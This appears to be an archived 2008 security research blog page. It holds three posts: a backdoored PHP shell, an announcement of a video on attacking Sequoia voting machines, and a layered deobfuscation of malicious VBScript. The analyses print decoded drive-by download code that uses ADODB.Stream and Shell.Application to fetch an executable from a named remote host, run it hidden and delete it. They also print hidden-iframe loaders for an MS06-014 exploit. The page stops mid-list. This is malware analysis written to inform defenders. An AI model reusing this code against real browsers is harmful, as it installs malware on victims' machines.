Menu:

Showing posts published in September 2008. Show all posts.

Backdoored PHP shells

PHP shells are tools that attackers often use to manage compromised web servers. It turns out, some of these attackers may be attacked by their own tools.

In fact, PhishTank report 505183 shows a nice example of a backdoor inserted in a PHP shell. The shell in question is a variant of the w4ck1ng shell. Each page generated by the shell contains the following script tag:

<script>
var dc=document.write;
var sc=String.fromCharCode;
var exe="http://reda-vision.com/config.exe";
var file="run.exe";
dc(sc(60,115,99,114,105,112,116,62,118,97,114,32,97,105,108,105,97,110,
44,122,104,97,110,44,99,109,100,115,115,59,97,105,108,105,97,110,61,34) + 
exe + sc(34,59,122,104,97,110,61,34) + file + sc(34,59,99,109,100,115,
115,61,34,99,109,100,46,101,120,101,34,59,116,114,121,123,118,97,114,32,
...
97,116,99,104,40,101,41,123,125,59,60,47,115,99,114,105,112,116,62));
</script>

After decoding the JavaScript code, a classic drive-by download attack is revealed:

var ailian,zhan,cmdss;
ailian="http://reda-vision.com/config.exe";
zhan="run.exe";
cmdss="cmd.exe";    
try{    
  var ado=(document.createElement("object"));
  var d=1;
  ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
  var e=1;
  var xml=ado.CreateObject("Microsoft.XMLHTTP","");
  var f=1;
  var ln="Ado";
  var lzn="db.St";
  var an="ream";
  var g=1;
  var as=ado.createobject(ln+lzn+an,"");
  var h=1;
  xml.Open("GET",ailian,0); 
  xml.Send(); 
  as.type=1;
  var n=1;
  as.open();
  as.write(xml.responseBody);
  as.savetofile(zhan,2);
  as.close();
  var shell=ado.createobject("Shell.Application","");
  shell.ShellExecute(zhan,"","","open",0);
  shell.ShellExecute(cmdss," /c del /S /Q /F "+zhan,"","open",0);
} catch(e){};

The config.exe file is detected by one third of the antivirus tools used by VirusTotal, and, according to the Anubis report, behaves like a Bifrost variant.


Attacking electronic voting systems: the video

Last summer, I was a member of the UCSB Computer Security Group that tested the security of the Sequoia electronic voting system. Our work was part of the Top-To-Bottom Review of electronic voting machines in California, ordered by Secretary of State D. Bowen.

Our task was to detect vulnerabilities in the Sequoia voting system and implement exploits that would "cause incorrect recording, tabulation, tallying or reporting of votes" or that would "alter critical election data such as election definition or system audit data".

We designed and implemented a number of these attacks. In particular, we proved that it is possible to combine several attacks to inject into the system a virus-like malicious software that automatically spreads to as many voting machines as possible. We have (at last!) been able to release a video we prepared that shows what can be achieved by such a virus.

The video lasts about 16 minutes: it gives a nice overview of the voting system and shows the complete life-cycle of the virus (click on the video to play it). If you are in a hurry, I recommend to start watching around minute 12:26 to see that votes can be changed on a VVPAT-enabled DRE machine and that seals can be bypassed without being detected.

You can download the video from here. More information is available on the Computer Security Group's voting page.

Update: the group's site has been slashdotted... The video can be found on youtube (part I, part II)


VBScript attack

What is VBScript used for? For web attacks, of course!

For example, flyzhu.9966.org, a domain used in the recent SQL injection campaigns (and, surprisingly, still active), offers some nice examples of malicious VBScript code. To run these samples, you can use Cscript under Windows. To dump interesting values to the console, just use the WScript.Echo function.

On flyzhu.9966.org, the first step of the attack is performed by following script:

<script language="VBScript">
Cn911="83,61,34,51,67,53,...,84,69,32,68"
Function Rechange(Q)
    S=Split(Q,",")
    Cn922=""
    For i = 0 To UBound(S)
        Cn922=Cn922&Chr(eval(S(i)))
    Next
    Rechange=Cn922
End Function
EXECUTE(Rechange(Cn911))
</script>

The actual content, in the Cn911 variable, is obfuscated by substituting each character with its ASCII encoding. Once decoded, one obtains another obfuscated script:

S="3C5363726970...6970743E"
D="Document.Write """""
C="&CHR(&H"
N=")"
DO WHILE LEN(S)>1
    IF ISNUMERIC(LEFT(S,1)) THEN
        D=D&C&LEFT(S,2)&N
        S=MID(S,3) 
    ELSE 
        D=D&C&LEFT(S,4)&N
        S=MID(S,5)
LOOP
EXECUTE D

The ASCII encoding trick is used again to obfuscate the actual content. The loop essentially reads two characters at a time from S, interprets them as a hex number, and substitutes the corresponding character in the ASCII encoding. The result is yet another obfuscated script:

Document.Write &CHR(&H3C)&CHR(&H53)...&CHR(&H70)&CHR(&H74)&CHR(&H3E)

The third round uses, again, ASCII encoding. Once deobfuscated, one obtains:

<Script Language=VBScript>
On Error Resume Next
Set Ob = Document.CreateElement("object")
Ob.SetAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
Set Pop = Ob.Createobject("Adodb.Stream","")
If Not Err.Number = 0 then
    Err.clear
    Document.write ("<embed src=flash.swf></embed>")
    Document.write ("<iFrame sRc=real.htm width=0 height=0></ifrAmE>")
    Document.write ("<iFrame sRc=new.htm width=0 height=0></ifrAmE>")
Else
    Document.write ("<iFrame sRc=help.htm width=0 height=0></ifrAmE>")
End If
</Script>

This script checks if the browser is vulnerable to the MDAC remote code execution exploit (MS06-014), and, depending on the result, loads different files. In all cases, these files attempt to exploit various vulnerabilities to download and execute a binary from http://www.tlcn.net/cert/fuckkr.exe.

In particular, the loaded files are: